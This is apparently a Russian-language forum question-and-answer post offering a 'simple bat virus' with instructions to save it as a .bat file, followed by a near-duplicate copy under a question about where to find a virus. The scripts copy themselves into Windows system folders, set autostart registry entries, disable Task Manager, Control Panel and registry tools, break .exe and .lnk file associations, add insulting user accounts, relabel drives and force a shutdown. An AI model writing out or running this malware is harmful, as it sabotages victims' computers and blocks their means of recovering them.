Вот простой bat вирусок !! пишеш в текстовам файле и даёш ему расширение ( bat )
за использование нижеизложенной информацию в целях нанесения вреда я не несу никакой ответственности.
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
copy %0 %windir%\system32
copy %0 %windir%\system
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\fear.bat" /f >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cooler" /t REG_SZ /d "%SystemRoot%\system\fear.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label c: LOL YOU HACKED
label d: "VICTOR ILYUHIN" THE BEST
shutdown -s -f -t 120 -c "Тебя предупреждали не заходить!!!! Теперь тебе пришла ЗАДНИЦЯ!!!! С уважением SAVAN@R!!!!КСТАТИ ПОСЛЕ ЗАГРУЗКИ ПОЯВЯТСЯ ПРОБЛЕМЫ!!! "
Прочее компьютерное
Кто может подсказать где найти вирус?
на порносайте
тестовый в архиве скачай
@echo off
copy %0 %windir%\system32
copy %0 %windir%\system
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label c: LOL YOU HACKED
label d: "VICTOR ILYUHIN" THE BEST
copy %0 %windir%\system32
copy %0 %windir%\system
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label c: LOL YOU HACKED
label d: "VICTOR ILYUHIN" THE BEST
напиши